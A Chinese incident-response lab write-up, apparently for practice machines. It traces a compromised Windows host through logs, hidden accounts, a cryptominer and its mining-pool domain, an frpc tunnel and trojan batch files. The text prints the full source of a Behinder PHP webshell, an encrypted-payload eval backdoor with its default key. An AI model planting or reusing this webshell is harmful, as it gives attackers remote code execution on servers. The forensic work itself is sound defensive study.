赞
踩
直接扫网站根目录 发现后门
- <?php
- @error_reporting(0);
- session_start();
- $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
- $_SESSION['k']=$key;
- session_write_close();
- $post=file_get_contents("php://input");
- if(!extension_loaded('openssl'))
- {
- $t="base64_"."decode";
- $post=$t($post."");
-
- for($i=0;$i<strlen($post);$i++) {
- $post[$i] = $post[$i]^$key[$i+1&15];
- }
- }
- else
- {
- $post=openssl_decrypt($post, "AES128", $key);
- }
- $arr=explode('|',$post);
- $func=$arr[0];
- $params=$arr[1];
- class C{public function __invoke($p) {eval($p."");}}
- @call_user_func(new C(),$params);
- ?>

找到shell连接密码,并进行解密,发现为默认冰蝎密码rebeyond
查看网站日志 得到攻击者IP 192.168.126.1
使用Windows日志一键分析功能 查看远程桌面登陆成功日志 发现未知用户名hack168$
在桌面处找到位置程序,运行后cpu飙升,判别为挖矿程序,进行分析
使用pyinstxtractor进行反编译得到pyc文件
-
- https://github.com/extremecoders-re/pyinstxtractor
使用在线pyc反编译工具,得到源码
-
- https://toolkk.com/tools/pyc-decomplie
得到矿池域名wakuang.zhigongshanfang.top
提交
1.直接查杀网站根目录 发现system.php后门
查看日志 得到攻击者第一个IP
查看php文件发现shell密码 hack6618
发现有隐藏用户 hack8887$ 记得删除
终端输入regedit
得到第二个IP 192.168.126.129
发现文档 感觉就是伪qq
点开发现是ftp攻击 且发现为frpc内网攻击 得到攻击者服务器 IP 以及端口
提交
查询隐藏用户 发现隐藏用户hack6618$
修改 隐藏用户hack6618$ 密码进行登入系统
发现攻击者IP
打开任务计时程序发现 .bat文件和flag1
打开system.bat 文件得到flag2 发现这是一个一句话木马
我们配置好PHPstudy登入网站发现是个 Z-Blog 进入后台发现没有密码 那我们直接下载nologin.php 就可以修改密码登入 工具网上搜就有
登入后台 在用户管理里面发现flag3
提交
感谢 知攻善防实验室提供的靶机 让我学到了不少关于应急响应的知识
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。